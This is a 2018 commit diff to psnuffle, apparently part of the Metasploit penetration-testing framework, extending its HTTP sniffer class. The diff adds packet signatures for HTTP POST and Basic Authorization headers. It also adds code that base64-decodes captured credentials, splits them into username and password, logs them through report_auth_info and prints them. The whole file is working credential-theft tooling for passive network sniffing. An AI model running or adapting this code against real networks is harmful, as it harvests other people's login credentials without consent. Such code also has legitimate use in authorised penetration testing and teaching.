Add support for HTTP POST and Basic Auth to psnuffle

2018-07-15 14:16:37 +00:00 · 2018-07-15 14:16:37 +00:00 · 6cd1593061
parent b9192d1bdb
commit 6cd1593061
1 changed files with 20 additions and 13 deletions
--- a/data/exploits/psnuffle/url.rb
+++ b/data/exploits/psnuffle/url.rb
@ -1,22 +1,24 @@
-# Psnuffle password sniffer add-on class for HTTP GET URL's
+# Psnuffle password sniffer add-on class for HTTP URLs
 # part of psnuffle sniffer auxiliary module
-#
-# Very simple example how to write sniffer extensions
-#

-# Sniffer class for GET URL's
+#
+# Sniffer class for GET/POST URLs.
+# Also extracts HTTP Basic authentication credentials.
+#
 class SnifferURL < BaseProtocolParser
  def register_sigs
    self.sigs = {
-      :get		=> /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
-      :webhost	=> /^HOST\:\s+([^\n\r]+)/i,
+      :get        => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
+      :post       => /^POST\s+([^\n]+)\s+HTTP\/\d\.\d/i,
+      :webhost	  => /^HOST:\s+([^\n\r]+)/i,
+      :basic_auth => /^Authorization:\s+Basic\s+([^\n\r]+)/i,
    }
  end

  def parse(pkt)
-    # We want to return immediantly if	we do not have a packet which is handled by us
+    # We want to return immediatly if	we do not have a packet which is handled by us
    return unless pkt.is_tcp?
-    return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
+    return if (pkt.tcp_sport != 80 && pkt.tcp_dport != 80)
    s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))

    self.sigs.each_key do |k|
@ -34,10 +36,16 @@ class SnifferURL < BaseProtocolParser
      case matched
      when :webhost
        sessions[s[:session]].merge!({k => matches})
-        if(s[:get])
+        if s[:get]
          print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
-          sessions.delete(s[:session])
-          return
+        end
+        if s[:post]
+          print_status("HTTP POST: #{s[:session]} http://#{s[:webhost]}#{s[:post]}")
+        end
+        if s[:basic_auth]
+          s[:user], s[:pass] = Rex::Text.decode_base64(s[:basic_auth]).split(':', 2)
+          report_auth_info s
+          print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user]} / #{s[:pass]}"
        end
      when nil
        # No matches, no saved state
@ -45,4 +53,3 @@ class SnifferURL < BaseProtocolParser
    end # end of each_key
  end # end of parse
 end # end of URL sniffer
-